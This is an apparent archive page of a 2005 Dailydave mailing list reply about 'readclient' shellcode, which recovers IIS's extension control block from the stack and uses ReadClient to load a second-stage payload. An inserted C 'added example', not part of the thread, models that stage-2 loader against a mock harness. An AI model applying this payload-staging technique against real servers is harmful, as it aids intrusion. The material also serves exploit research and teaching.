Dailydave mailing list archives
Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness
From: Dave Aitel <dave () immunitysec com>
Date: Fri, 07 Jan 2005 13:39:00 -0500
halvar () gmx de wrote:
(The following note is stuff Halvar and a lot of people already know or find too obvious to mention, but not everyone does)

Readclient shellcode is the obvious way to go when doing ISAPI. The retrieval of the connection ID is in most cases not a problem -- very few ISAPIs I've seen overflow in a different thread than the one that went through HttpExtensionProc. In that case, unless you're very unlucky, your ESP is still intact, and unless you _really_ smashed the stack (e.g. memcpy(,,-1)) you will have no problem retrieving the lpECB from [ESP+static_offset]. Remember that stack frame sizes are constant for a given executable, and that you can just rely on a value you figured out in your own debugger here. Of course, you have to adjust 1 offset in the shellcode to make it work for different targets.
This is true in some cases, but not in others (heap overflows, even some stack overflows). A good ISAPI code will handle those cases. It's nice to avoid that extra step, in any case. :>
-dave

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
https://lists.immunitysec.com/mailman/listinfo/dailydave
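The two halves of the technique discussed above, as an added example that is not part of the thread and not Dave's or Halvar's code: once a candidate lpECB has been pulled off the stack, sanity-check it before trusting it (a live EXTENSION_CONTROL_BLOCK starts with cbSize == sizeof(struct) and dwVersion == HSE_VERSION, so a bad offset on a different target fails the check instead of crashing), then pull the second stage through the block's ReadClient pointer, looping because IIS delivers the body in pieces. The struct is a cut-down stand-in for the real ECB (assumption: only the fields used here, in the real order), the version constant is assumed to be IIS 5's 0x00050001, the mock ReadClient and the request body are constructed, and the actual [ESP+static_offset] read happens in the shellcode itself and is not modelled.

```c
/* Added example, not from the Dailydave thread: a portable-C model of
 * "readclient shellcode" so it runs outside IIS. Assumptions are marked. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

typedef int BOOL;
typedef uint32_t DWORD;

/* Cut-down stand-in for EXTENSION_CONTROL_BLOCK (assumption: only these
 * fields). The real struct also starts with cbSize and dwVersion, which is
 * what makes a cheap sanity check on a recovered pointer possible. */
typedef struct ECB {
    DWORD cbSize;        /* == sizeof(ECB) in a live block */
    DWORD dwVersion;     /* HSE_VERSION; assumed 0x00050001 (IIS 5) here */
    void *ConnID;        /* per-request connection handle */
    DWORD cbTotalBytes;  /* total bytes in the request body */
    DWORD cbAvailable;   /* bytes already delivered in lpbData */
    unsigned char *lpbData;
    BOOL (*ReadClient)(void *ConnID, void *buf, DWORD *size);
} ECB;

#define ASSUMED_HSE_VERSION 0x00050001u

/* Sanity-check a candidate pointer recovered from [ESP+offset] before use. */
int looks_like_ecb(const ECB *c) {
    return c != NULL && c->cbSize == sizeof(ECB)
        && c->dwVersion == ASSUMED_HSE_VERSION && c->ReadClient != NULL;
}

/* Pull `want` bytes of second stage: first what IIS already handed over in
 * lpbData, then ReadClient until done. ReadClient may return fewer bytes per
 * call, so loop; stop on error or a zero-length read (connection closed). */
size_t fetch_stage2(ECB *ecb, unsigned char *out, size_t want) {
    size_t got = ecb->cbAvailable < want ? ecb->cbAvailable : want;
    memcpy(out, ecb->lpbData, got);
    while (got < want) {
        DWORD n = (DWORD)(want - got);
        if (!ecb->ReadClient(ecb->ConnID, out + got, &n) || n == 0)
            break;
        got += n;
    }
    return got;
}

/* --- constructed harness standing in for the IIS side --- */
typedef struct { const unsigned char *data; size_t len, pos; } Conn;

/* Mock ReadClient: hands back at most 5 bytes per call to exercise the loop. */
static BOOL mock_read_client(void *ConnID, void *buf, DWORD *size) {
    Conn *c = (Conn *)ConnID;
    size_t left = c->len - c->pos, n = *size < 5 ? *size : 5;
    if (n > left) n = left;
    memcpy(buf, c->data + c->pos, n);
    c->pos += n;
    *size = (DWORD)n;
    return 1;
}

static const unsigned char body[] = "STAGE2-PAYLOAD-BYTES-FOLLOW-HERE"; /* 32 bytes, constructed */

/* Build a mock ECB over the constructed body and fetch `want` bytes. */
size_t demo(unsigned char *out, size_t want) {
    Conn conn = { body, sizeof(body) - 1, 4 };   /* first 4 bytes already delivered */
    ECB ecb = { sizeof(ECB), ASSUMED_HSE_VERSION, &conn, (DWORD)(sizeof(body) - 1),
                4, (unsigned char *)body, mock_read_client };
    if (!looks_like_ecb(&ecb)) return 0;
    return fetch_stage2(&ecb, out, want);
}

/* Check the sanity test on a candidate with a given cbSize (other fields valid). */
int check_candidate(DWORD cbSize) {
    ECB c = { cbSize, ASSUMED_HSE_VERSION, NULL, 0, 0, NULL, mock_read_client };
    return looks_like_ecb(&c);
}

/* 1 if an exact read returns the whole body and an over-long read stops
 * cleanly at the end of the body instead of spinning. */
int demo_ok(void) {
    unsigned char buf[64];
    size_t n1 = demo(buf, 32);
    int exact = (n1 == 32) && memcmp(buf, body, 32) == 0;
    size_t n2 = demo(buf, 40);
    return exact && n2 == 32;
}

int main(void) {
    printf("candidate ok=%d bad=%d, fetch ok=%d\n",
           check_candidate(sizeof(ECB)), check_candidate(0), demo_ok());
    return 0;
}
```

In real shellcode the candidate pointer comes from the fixed frame offset Halvar describes; the cbSize/dwVersion test is the cheap guard that turns a wrong offset on an untested target into a controlled failure rather than an access violation, and the loop is what makes the stage-2 read reliable when the body does not arrive in one ReadClient call.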
Current thread:
- A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness Dave Aitel (Jan 06)
- Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness Anthony . zboralski (Jan 06)
- Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness H D Moore (Jan 06)
- Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness halvar (Jan 07)
- Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness Dave Aitel (Jan 07)